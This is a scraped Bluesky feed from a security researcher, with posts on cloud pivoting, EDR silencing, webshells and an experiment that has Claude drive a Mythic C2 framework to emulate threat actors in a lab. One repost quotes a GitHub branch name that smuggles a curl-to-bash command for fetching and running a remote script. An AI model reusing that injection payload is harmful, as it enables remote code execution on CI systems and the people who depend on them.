SOCKS over SSH over AWS SSM Session Manager
0xbruno.dev/posts/cloud/...
@0xbruno.bsky.social
application & cloud security stuff | philosophy, chess, weight lifting, and whiskey enjoyer
SOCKS over SSH over AWS SSM Session Manager
0xbruno.dev/posts/cloud/...
β¨ vibe coded malware β¨
11.04.2025 18:03 β π 0 π 0 π¬ 0 π 0Pentester = almost a hacker
31.03.2025 20:01 β π 0 π 0 π¬ 0 π 0On PTO and bored, so playing around with MCP by exposing Mythic APIs to Claude and seeing what the result. Attempting to have it emulate threat actors while operating Apollo in a lab... would make a good sparring partner :D www.youtube.com/watch?v=ZooT...
20.03.2025 22:24 β π 20 π 6 π¬ 1 π 0Iβm assuming if an Entra ID tenant has Certificate Based Authentication enabled and the CAs trusted, you could pivot from on prem ADCS issues like ESC1 to the cloud ? π€
12.03.2025 21:12 β π 0 π 0 π¬ 0 π 0Wow, how did I not use this yet?! github.com/alufers/mitm...
06.01.2025 16:21 β π 19 π 5 π¬ 2 π 0[NEW BLOG]
EDR Silencer and Beyond: Exploring Methods to Block EDR Communication - Part 2
In collaboration with
@fabian.bader.cloud
academy.bluraven.io/blog/edr-sil...
#redteam
cool seeing people I look up to talk more intelligently about the EDR silencing techniques
I talked about Hosts file and a local bring-your-own HTTP CONNECT βfirewallβ sinkhole back in November
0xbruno.dev/posts/resear...
academy.bluraven.io/blog/edr-sil...
@cyb3rmonk.bsky.social
An attacker successfully phished a Cyberhaven employee.
They gained access to their Chrome Web Store admin credentials and published a malicious version of the Cyberhaven extension.
Read my full writeup here:
www.vulnu.com/p/breaking-c...
Thanks @jaimeblascob.bsky.social and @johntuckner.me
when you have to push a remediation for a dumb security bug for compliance and devs look at you diff
27.12.2024 02:12 β π 0 π 0 π¬ 0 π 0The struggle is real.
24.12.2024 16:24 β π 8237 π 1972 π¬ 79 π 247At this pace security appliances getting popped more than other software π
22.12.2024 23:33 β π 0 π 0 π¬ 0 π 0Wonder whoβs gonna be the Docker and k8s of agentic AI and orchestration. Think infosec will probably pivot to abusing the orchestration flows and architecture of agentic AI. Essentially adding an abstraction layer but weβll still need knowledge of the underlying systems
20.12.2024 19:51 β π 2 π 0 π¬ 0 π 0It was talked about here first around the 7:30 mark. So totally not my bug. I reported to MSRC anyways since I couldnβt find anything else on this topic. Iβll blog after they respond.
youtu.be/ANYtLQrT-F0?...
βΉοΈ
20.12.2024 14:58 β π 0 π 0 π¬ 0 π 0protonmail is down and their status page doesnβt reflect any errors >:(
status.proton.me
pentesters when they remember they left an unprotected webshell on an engagement months ago
12.12.2024 18:41 β π 1 π 0 π¬ 0 π 0A simple black and white cartoon illustration showing a stylized representation of "ALL MODERN DIGITAL INFRASTRUCTURE" as a tower-like structure made of various rectangular blocks and components. Each component and layer of the structure is labeled with the word "backdoor" multiple times, suggesting widespread security vulnerabilities in digital systems. The illustration uses a minimalist style with basic geometric shapes and text annotations connected by lines pointing to different parts of the structure.
A diagram from Kaspersky showing the Operation Triangulation attack chain with neon green icons and text connected by dotted arrows. The chain begins with an βAttackers iMessage accountβ and progresses through multiple stages including PDF file, TrueType font exploit, ROP/JOP, NSExpression, bplist, and other technical components. Various CVE numbers are listed, including CVE-2023-41990, CVE-2023-32434, and CVE-2023-38606. The chain culminates in malware deployment through multiple exploitation steps involving Safari, kernel exploits, and validators.
blunt versus beauty
09.12.2024 17:01 β π 12 π 1 π¬ 0 π 1ethernet? you mean the wifi cable
09.12.2024 17:01 β π 949 π 142 π¬ 37 π 18getting to work with people much smarter than you is such an underrated benefit
06.12.2024 23:44 β π 1 π 1 π¬ 0 π 1find those sweet creds in azure container app env vars
github.com/0xBruno/Get-...
Picture of a Github PR with text reading openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
absolutely incredible attack vector
06.12.2024 03:27 β π 969 π 264 π¬ 17 π 53reading Fear and Trembling by Kierkegaard hoping for some deep insights. summary is βjust trust me broβ -god
04.12.2024 00:41 β π 0 π 0 π¬ 0 π 0Definitely the internet but seems especially prevalent in infosec. One day natsec expert the next niche geopolitical expert. Meanwhile their org still has admin panels facing the web without mfa π΅βπ«
04.12.2024 00:40 β π 0 π 0 π¬ 0 π 0Was Dostoevsky a time traveler?
01.12.2024 10:35 β π 376 π 75 π¬ 17 π 0truly one of the skeets of all time
29.11.2024 03:37 β π 0 π 0 π¬ 0 π 0